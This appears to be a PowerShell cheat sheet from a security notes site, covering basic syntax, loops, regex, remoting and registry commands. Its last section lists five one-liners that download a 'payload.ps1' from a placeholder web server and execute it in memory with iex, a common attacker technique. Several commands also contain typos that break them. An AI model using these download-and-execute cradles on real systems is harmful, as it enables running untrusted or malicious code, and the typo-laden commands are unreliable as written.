Powershell Cheat Sheet

Powershell Usefull Command

1
# Run Powershell with Administration Privilages
2
3
Start-Process Powershell -verb runas
4
5
# Powershell Help
6
7
Get-Help <cmdlet>
8
- ex : Get-Help Get-Process
9
- ex : Get-Help Get-Process -example
10
11
# Poershell Help Update
12
13
Update - Help
14
15
# Get All Command and Function
16
17
Get-Command
18
19
# List all property on Process
20
21
Get-Process -name <processName> | format-list -Property *
22
23
# Recursive directory and get spesifik child item
24
25
gci c:\*.* -include *.txt
26
27
# Find Execution Policy
28
29
Get-ExecutionPolicy
30
31
# Listing All Function
32
33
ls function:
Copied!

Powershell Variable

1
# Set Variable and Variable Type
2
3
$a = "String" #String
4
$a = 4 #Intiger
5
6
[int]$a = 4
7
[System.Int32]$a = 4
8
9
# Common data type shortcuts
10
[datetime]
11
[string]
12
[char]
13
[double]
14
[int]
15
[boolean]
Copied!

Comparison Operators

1
-eq Equal to (=)
2
-lt Less than (<)
3
-gt Greater than (>)
4
-ge Greater than or equal (>=)
5
-le Less than or equal (<=)
6
-ne Not equal to (!=)
Copied!

Logical Operators

1
-not Not
2
! Not
3
-and And
4
-or Or
5
-is
6
-isnot
7
-as
8
-xor
Copied!

If Statements

1
if (condition) {run this code block}
2
3
elseif (condition) {run this code block}
4
5
else {run this code block}
Copied!

For Each Loop

1
$a = 5,6,7,8
2
3
# 1. Usage
4
5
$a | ForEach {write-host $_}
6
7
# 2. Usage
8
9
ForEach ($value in $a)
10
{write-host $value}
Copied!

For Loop

1
for ($a=1; $a -le 3; $a++)
2
{write-host $a}
Copied!

Do While Loop

1
$a = 1
2
do {write-host $a; $a++}
3
while ($a -lt 0)
Copied!

Regex

1
. (period) - matches a single character
2
[aeiou] - matches at least one character spesicied within the brackets
3
[b-f] - matches at least one character specified within a range
4
[^bcdef] - matches any character except those within the brackets
5
^ - matches characters located at the beginning of a string
6
$ - matches character located at the end of a string
7
* - matches zero or more occurences of the preceding charater
8
? - matches zero or one occourences of the preceding character
9
\\ - matches the character following the escape (\\) character
10
11
# Regular Expression Qualifiers
12
13
* - must match zero or more times
14
+ - must match one or more times
15
? - must match no more than one time
16
{n} - must match n times
17
{n,} - must at least n matches
18
{n,m} - must match at least n times, but not more than m times
19
20
# Regular Expression Shortcuts
21
22
\\d - matches any decimal digit, same as [0-9]
23
\\w - matches any word character, same as [0-9A-Za-z_]
24
\\D - matches any non-digit
25
\\W - matches any non-word character such as space
26
\\S - matches any non-whitespace character
Copied!

Powershell Escape Character

1
# Escape Character
2
3
` - at the end of a command line to continue the command on the next line
4
`$ - to include a $ in the output
5
`0 - means NULL ($null is preffered)
6
`a - makes an Alert sound
7
`b - means backspace
8
`f - means formfeed (only affect printed documents)
9
`n - means new line
10
`r - means carriage return
11
`t - means horizontal tab
12
`v - means vertical tab (only affect printed documents)
13
`' - means single quote
Copied!

Powershell Parameters

1
Param(
2
[Parameter(Mendatory=$true)]
3
[string]$username
4
)
5
6
$a = $username
7
Write-Host "Hello $a"
8
9
Command Line > .\\example.ps1 Kyyyle
10
11
Command Line Output > Hello Kyylee
Copied!

Powershell Remote Computer Sessions

1
# Create Session
2
3
New-PSSession -ComputerName <computername> -Credential <domain name>\\<domain user>
4
5
# Get Sessions
6
7
Get-PSSession
8
9
# Login Session
10
11
Enter-PSSession -id <Session ID>
12
13
# Enable Powershell Remoting
14
15
Enable-PSRemoting -Force
Copied!

Running Command Remote Machine wiht Powershell

1
# Remote Code Execution on the Remote Machine
2
3
Invoke-Command -ScriptBlock {whoami; (Get-Host).version; Get-Process} -ComputerName <computerName> -Credential <domainName>\\<domainUserName>
4
5
# Remote File Execution on the Remote Machine
6
7
Invoke-Command -FilePath <Powershell File> -ComputerName <computerName> -Credential <domainName>\\<domainUserName>
Copied!

Powershell Registery

1
# Get Registery Drives
2
3
Get-PSProvider -PSProvider Registery
4
5
# Get Registery Property
6
7
Get-Item 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
8
9
# Access Registery Provider
10
11
Set-Location Registery::
12
13
# Add new path in the Registery
14
15
New-Item -Path <Path> ex: (HKCU:\\Test}
16
17
# Add key value in the property
18
19
New-ItemProperty -Path <path> -Name <Property Name> -PropertyType <property type> -Value <value>
20
21
ex : New-ItemProperty -Path HKCU:\\Test -Name Reg2 -PropertyType String -Value 1
22
23
# Rename path name in the Registery
24
25
Rename-Item <Old Path> -newname <new name>
Copied!

Powershell File Download Example

1
# 1. Example
2
3
iex (New-Object New.WebClient).DownloadString('<https://webserver/paylaod.ps1>')
4
5
# 2. Example
6
7
$ie=New-Object -ComObject
8
InternetExplorer.Application; $ie.visible=$False; $ie.navigate('<http://webserver/payload.ps1>'); sleep 5; $response=$ie.Document.body.innerHTML; $ie.quit(); iex $response
9
10
# 3. Example (PSv3 onwards)
11
12
iex (iwr '<http://webserver/payload.ps1>')
13
14
# 4. Example
15
16
$h=New-Object -ComObject
17
Msxml2.XMLHTTP; $h.open('GET','<http://webserver/payload.ps1>',$false);$h.send();iex
18
$h.responseText
19
20
# 5. Example
21
22
$wr = [System.NET.WebRequest]::Create("<http://webserver/payload.ps1>")
23
$r = $wr.GetResponse()
24
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
25
Copied!
Last modified 1yr ago
Copy link
Contents